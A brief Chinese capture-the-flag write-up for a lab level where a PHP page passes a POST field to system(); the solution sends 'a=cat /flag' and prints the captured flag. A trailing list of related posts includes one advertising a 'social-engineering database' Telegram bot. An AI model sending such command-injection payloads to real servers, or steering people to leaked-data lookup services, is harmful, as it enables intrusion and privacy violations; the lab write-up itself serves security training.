HelloCTF [RCE-labs] Level 3 - 命令执行

开启靶场,打开链接:

这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);

system() 函数会通过软连接执行你输入的系统命令

POST传参:a=cat /flag

成功得到flag:

NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}

相关推荐
网络安全-老纪13 分钟前
网络安全-js安全知识点与XSS常用payloads
javascript·安全·web安全
underatted26 分钟前
2025tg最新免费社工库机器人
web安全·网络安全
火龙果wa4 小时前
当今前沿技术:改变生活的创新趋势
经验分享·生活
H轨迹H5 小时前
Vulnhun靶机-kioptix level 4-sql注入万能密码拿到权限ssh连接利用mysql-udf漏洞提权
网络安全·渗透测试·vulnhub·靶机·web漏洞·oscp
StickToForever5 小时前
第4章 信息系统架构(三)
经验分享·笔记·学习·职场和发展
网安加云课堂6 小时前
课程分享 | 安全系统建设的挑战与解决方案
网络·安全·web安全
微刻时光7 小时前
影刀RPA中级证书-Excel进阶-开票清单
经验分享·python·低代码·rpa·影刀·影刀证书·影刀实战
黑客Ela7 小时前
网络安全营运周报
网络·安全·web安全
狂野小青年7 小时前
在PHP Web开发中,实现异步处理有几种常见方式的优缺点,以及最佳实践推荐方法
消息队列·php·最佳实践·异步任务
挣扎与觉醒中的技术人7 小时前
网络安全入门持续学习与进阶路径(一)
网络·c++·学习·程序人生·安全·web安全